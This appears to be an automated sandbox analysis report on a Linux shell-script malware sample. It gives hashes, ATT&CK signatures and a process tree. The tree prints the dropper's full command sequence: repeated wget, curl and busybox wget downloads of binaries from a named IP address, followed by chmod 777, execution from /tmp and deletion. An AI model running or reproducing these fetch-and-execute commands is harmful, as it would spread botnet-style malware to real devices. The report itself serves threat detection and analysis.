Analysis
-
max time kernel
16s -
max time network
17s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 01:44
Static task
static1
Behavioral task
behavioral1
Sample
53c89ccecd759bd8a96b663861e17924396e8fab5a89847d081069ea02c029f5.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
53c89ccecd759bd8a96b663861e17924396e8fab5a89847d081069ea02c029f5.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
53c89ccecd759bd8a96b663861e17924396e8fab5a89847d081069ea02c029f5.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
53c89ccecd759bd8a96b663861e17924396e8fab5a89847d081069ea02c029f5.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
53c89ccecd759bd8a96b663861e17924396e8fab5a89847d081069ea02c029f5.sh
-
Size
10KB
-
MD5
d4ab58d74eb566758ead7de02f94f393
-
SHA1
efe4f78df2d009a552bb496ea70caa028411f1c8
-
SHA256
53c89ccecd759bd8a96b663861e17924396e8fab5a89847d081069ea02c029f5
-
SHA512
92fbfa98c923e6b6f21912ef368480198e3955b5bf3a589ffb95714538eda227f6965df4abd96ff54231b1b3d295efaafac564aeffcd194762b51193dec146fa
-
SSDEEP
96:xN9DLkvRwWul6Wl7hzrSvTiO+xwMLLQW6yF9DLki+wWul6WrcxcVF3tzrSvTwRRF:xN9DLkvRK3LQW/TDLkg/9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 739 chmod 747 chmod 769 chmod 787 chmod 799 chmod 805 chmod 676 chmod 696 chmod 716 chmod 793 chmod 811 chmod 817 chmod 669 chmod -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP 670 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP /tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ 677 QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ /tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy 697 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy /tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ 717 QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ /tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F 740 uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F /tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J 749 Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J /tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id 770 GtTyy46k97PMs25DsIOKewPL4B9poyk8id /tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 788 gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 /tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln 794 DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln /tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N 800 O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N /tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC 806 QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC /tmp/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N 812 a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N /tmp/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX 818 zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX -
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy curl File opened for modification /tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J curl File opened for modification /tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id curl File opened for modification /tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln curl File opened for modification /tmp/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX curl File opened for modification /tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP curl File opened for modification /tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ curl File opened for modification /tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 curl File opened for modification /tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N curl File opened for modification /tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC curl File opened for modification /tmp/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N curl File opened for modification /tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ curl File opened for modification /tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F curl
Processes
-
/tmp/53c89ccecd759bd8a96b663861e17924396e8fab5a89847d081069ea02c029f5.sh/tmp/53c89ccecd759bd8a96b663861e17924396e8fab5a89847d081069ea02c029f5.sh1⤵PID:637
-
/bin/rm/bin/rm bins.sh2⤵PID:642
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:644
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:655
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:665
-
-
/bin/chmodchmod 777 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- File and Directory Permissions Modification
PID:669
-
-
/tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP./P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Executes dropped EXE
PID:670
-
-
/bin/rmrm P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:671
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:673
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:674
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:675
-
-
/bin/chmodchmod 777 QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- File and Directory Permissions Modification
PID:676
-
-
/tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ./QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Executes dropped EXE
PID:677
-
-
/bin/rmrm QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:678
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:680
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:686
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:691
-
-
/bin/chmodchmod 777 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- File and Directory Permissions Modification
PID:696
-
-
/tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy./2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Executes dropped EXE
PID:697
-
-
/bin/rmrm 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:698
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:700
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:706
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:711
-
-
/bin/chmodchmod 777 QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- File and Directory Permissions Modification
PID:716
-
-
/tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ./QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Executes dropped EXE
PID:717
-
-
/bin/rmrm QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:718
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:720
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:727
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:736
-
-
/bin/chmodchmod 777 uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F./uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:741
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:744
-
-
/bin/chmodchmod 777 Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J./Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:764
-
-
/bin/chmodchmod 777 GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id./GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:785
-
-
/bin/chmodchmod 777 gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7./gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:790
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:792
-
-
/bin/chmodchmod 777 DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln./DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:795
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:796
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:798
-
-
/bin/chmodchmod 777 O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N./O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:801
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:802
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:804
-
-
/bin/chmodchmod 777 QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC./QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵PID:810
-
-
/bin/chmodchmod 777 a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N./a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵PID:814
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵PID:816
-
-
/bin/chmodchmod 777 zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX./zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵PID:820
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97